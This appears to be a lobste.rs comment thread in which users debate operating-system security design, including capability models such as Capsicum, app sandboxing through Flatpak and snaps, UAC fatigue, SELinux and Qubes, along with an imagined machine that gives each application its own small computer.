                                                                                  I’d make that broader: A global shared namespace is an antipattern. Sharing should be via explicit delegation, not as a result of simply being able to pick the same name. This is the core principle behind memory-safe languages (you can’t just make up an integer, turn it into a pointer, and access whatever object happens to be there). It’s also the principle behind capability systems.

                                                                                  The Capsicum model retrofits this to POSIX. A process in capability mode loses access to all global namespaces: the system calls that use them stop working. You can’t open a file, but you can openat a file if you have a directory descriptor. You can’t create a socket with socket, but you can use recvfrom on a socket that you have to receive a new file descriptor for a socket. Capsicum also extends file descriptors with fine-grained rights so you can, for example, delegate append-only access to a log file to a process, but not allow it to read back earlier log messages or truncate the log.

                                                                                  Capsicum works well with the Power Box model for privilege elevation in GUI applications, where the Open… and Save… dialog boxes run as more privileged external processes. The process invoking the dialog box then receives a file descriptor for the file / directory to be opened or a new file to be written to.

                                                                                  It’s difficult to implement in a lot of GUI toolkits because their APIs are tightly coupled with the global namespace. For example, by returning a string object representing the path from a save dialog, rather than an object representing the rights to create a file there.

                                                                                  1. 3

                                                                                    I think that snaps (https://snapcraft.io/) have this more granular permission model, but nobody seems to like them (partially because they’re excruciatingly slow, which is a good reason).

                                                                                    1. 2

                                                                                      Yeah, Flatpak does this too. It’s why I’m generally on board with Flatpak, even though the bundled library security problem makes me uncomfortable: yes they have problems, but I think they solve more than they create. (I think.) Don’t let perfect be the enemy of good, etc.

                                                                                    2. 3

                                                                                      Global shared filesystem is an antipattern (it is a cause of security, maintenance, programming problems/corner cases). Each program should have private storage capability, and sharing data between application should be well regulated either by (easily) pre-configured data pipelines, or with interactive user consent.

                                                                                      I would not classify a global shared filesystem as antipattern. It has its uses and for most users it is a nice metaphor. As all problems that are not black or white, what is needed is to find the right balance between usefulness, usability and security.

                                                                                      That said, I agree on the sentiment that the current defaults are “too open”, and reminiscent of a bygone era.

                                                                                      Before asking for pre-configured data pipelines (hello selinux), or interactive user consent (hello UAC), we need to address real-world issues that users of Windows 7+ and macOS 10.15 know very well. Here are a couple of examples:

                                                                                      • UAC fatigue. People do not like being constantly asked for permission to access their own files. “It is my computer, why are you bothering me?” «Turn off Vista’s overly protective User Account Control. Those pop-ups are like having your mother hover over your shoulder while you work» (from the New York Times article “How to Wring a Bit More Speed From Vista”)
                                                                                      • Dialog counterfeits. If applications have the freedom to draw their own widgets on the screen (instead of being limited to a fixed set of UI controls), then applications will counterfeit their own “interactive user consent” panel. (Zoom was caught faking a “password needed” dialog, for example). Are we going to forbid apps from drawing arbitrary shapes or do we need a new syskey?
                                                                                      • Terminal. Do the terminal and the shell have access to everything by default, or do you need to authorize every single cd and ls?
                                                                                      • Caching. How long should authorization tokens be cached? For each possible answers there are pros and cons. Ask administrators of Kerberos clusters for war stories.
                                                                                      1. 4

                                                                                        If you insist on global filesystem (on this imaginary OS design meeting we are at), I’d rather suggest two shared filesystems, much like how a Harvard Architecture separates code and data, one for “system files, application installs”, and one for user data.

                                                                                        By preconfigured data pipelines I’d rather imagine something like https://genode.org/ Sculpt . I’d create “workspaces” with the virtual desktop methaphor, which could be configured in an overlay, where apps (and/or their storage spaces, or dedicated storage spaces) as graph nodes could be linked via “storage access” typed links graphically.

                                                                                        On a workspace for ProjectA and its related virtual desktop I could provide Spreadsheets, Documents, and Email apps StorageRW links to ProjectAStorage object. Even access to this folder can be made default in the given security context.

                                                                                        Regarding the terminal: I don’t think it is a legitimate usecase to have access to everything just because you use a text base tool. Open a terminal in the current security context.

                                                                                        Regarding the others: stuff can be tuned, once compartmentalization is made user-friendly, stuff gets simpler. Reimagining stuff from a clean sheets would be beneficial, as reverse compat costs us a lot, and I’d argue maybe more than it gets.

                                                                                        With SeLinux my main problem is its bolted-on nature, and the lack of its easy and intuitive confiiuration, which is worsened by the lack of permission/ACL/secontext inheritance in unix filesystems. Hello relabeling after extracting a tar archive…

                                                                                        About the other points i partly agree, they are continuously balancing these workflows, and fighting abuse (a8y features abused on android, leading to disabling some features to avoid fake popups, if I recall correctly)

                                                                                    3. 4

                                                                                      A while ago I dreamed up – but never really got around to trying to build one (although I do have a few hundred lines of very bad Verilog for one of the parts) – an interesting sort of machine, which kind of takes this idea to its logical conclusion, only in hardware. Okay I didn’t exactly dream it up, the idea is very old, but I keep wondering how a modern attempt at it would look like.

                                                                                      Imagine something like this:

                                                                                      • A stack of 64 or so small SBCs, akin to the RPi Zero, each of them running a bare-metal system – essentially, MS-DOS 9.0 + exactly one application :)…
                                                                                      • …with a high-speed interconnect so that they can pass messages to/from each other …
                                                                                      • …and another high-speed interconnect + a central video blitter, that enables a single display to show windows from all of these machines. Sort of like a Wayland compositor, but in hardare.

                                                                                      Now obviously the part about high-speed interconnect is where this becomes science fiction :) but the interesting parts that result from such a model are pretty fun to fantasize about:

                                                                                      • Each application has its own board. Want to run Quake V? You just pick the Quake V cartridge – which is actually a tiny computer! – and plug it in the stack. No need to administer anything, ever, really.
                                                                                      • All machines are physically segregated – good luck getting access to shared resources, ‘cause there aren’t any (in principle – in my alternate reality people haven’t quite figured out how to write message-passing code that doesn’t suffer from buffer overflows, I guess, and where a buffer can be overflown, anything can happen given enough determination).
                                                                                      • Each machine can come with its own tiny bit of fancy hardware. High-resolution, hi-fi DAC for the MP3 FLAC player board, RGB ambient LEDs for the radio player, whatever.
                                                                                      • Each machine can make its own choices in terms of all hardware, for that matter, as long as it plays nice on the interconnect(s). “Arduino Embedded Development Kit” board. the one that runs the IDE? Also sports a bunch of serial ports (real serial ports, none of that FTDI stuff), four SPI ports, eight I2C ports, and there’s a tiny logic analyzer on it, too. The Quake V board is mostly a CPU hanging off two SLI graphics cards probably.

                                                                                      I mean, with present-day tech, this would definitely be horrible, but I sometimes wonder if my grandkids aren’t going to play with one of these one day.

                                                                                      Lots and lots and lots of things in the history of computing essentially happened because there was no way to give everyone their own dedicated computer for each task, even though that’s the simplest model, and the one that we use to think about machines all the time, too (even in the age of multicore and little.BIG and whatnot). And lots of problems we have today would go away if we could, in fact, have a (nearly infinite) spool of computers that we could run each computational task on.

                                                                                      1. 3

                                                                                        I would, 100%, buy such a machine.

                                                                                        I seem to recall someone posted onto lobste.rs something about a “CP/M machine of the future” box a while back: a box with 16 or 32 Z80’s, each running CP/M and mulitplexing the common hardware like the screen. SOunds similar in spirit to what you’re describing, maybe.

                                                                                        1. 3

                                                                                          This reminds me GreenArrays even if there are major differences.

                                                                                          1. 2

                                                                                            the EOMA68 would probably have benefited from this idea. They were working on the compute engine being in Cardbus format that could be exchanged…

                                                                                            1. 1

                                                                                              What could we call the high-speed interconnect?

                                                                                              Well, it’s an Express Interconnect, and it’s for Peripheral Components, so I guess PCIE would be a good name.

                                                                                              It could implement hot-swapping, I/O virtualization, etc for the “cartridges” (that’s a long word, lets call them “PCIE cards”).

                                                                                              1. 1

                                                                                                I think I initially wanted to call it Infiniband but I was going through a bit of an Infiniband phase back when I first concocted this :).

                                                                                            2. 2

                                                                                              Sounds to me like an object capabilities system with extra segregation of users. Would that be a fair assessment?

                                                                                              1. 3

                                                                                                I think, in my mental model, it would be a subset or a particular instance of an object capabilities system.

                                                                                              2. 2

                                                                                                (I know Qubes does something like this, but its mechanism is different from what I’m describing here.)

                                                                                                Can you elaborate on how it’s different? What you’re describing sounds exactly like Qubes.

                                                                                                1. 2

                                                                                                  Let me preface this with “I may be completely wrong about Qubes.”

                                                                                                  From what I understand, Qubes is a single-user operating system with multiple security domains, implemented as different virtual machines (or containers? I don’t remember).

                                                                                                  In my idea different users, if any, run in different virtual machines under a hypervisor. The individual users run a little single-user operating system. That single user system has a single security domain under which all applications run, but applications are granted certain capabilities at runtime and are killed if they violate those capabilities. So all the applications are in the same security domain but accorded different capabilities (I had used OpenBSD’s pledge as an example, which isn’t quite like a classic capability system but definitely in the same vein).

                                                                                                  In my mind, it’s basically a Xen hypervisor running an instance of HaikuOS per user, with a little sand boxing mechanism per app. There are no per-file permissions or ownership, but rather application-specific limitations as expressed by the sandbox program associated with them.

                                                                                                  The inspiration was VM/CMS, in its original incarnation where CMS was still capable of running on the bare metal; if your machine doesn’t have multiple users you can just run the little internal single-user OS directly on your hardware. Only on physically shared machines would you need to run the hypervisor.

                                                                                                2. 2

                                                                                                  It’s obviously a different approach but very fine grained permissions is a feature of recent macOS releases.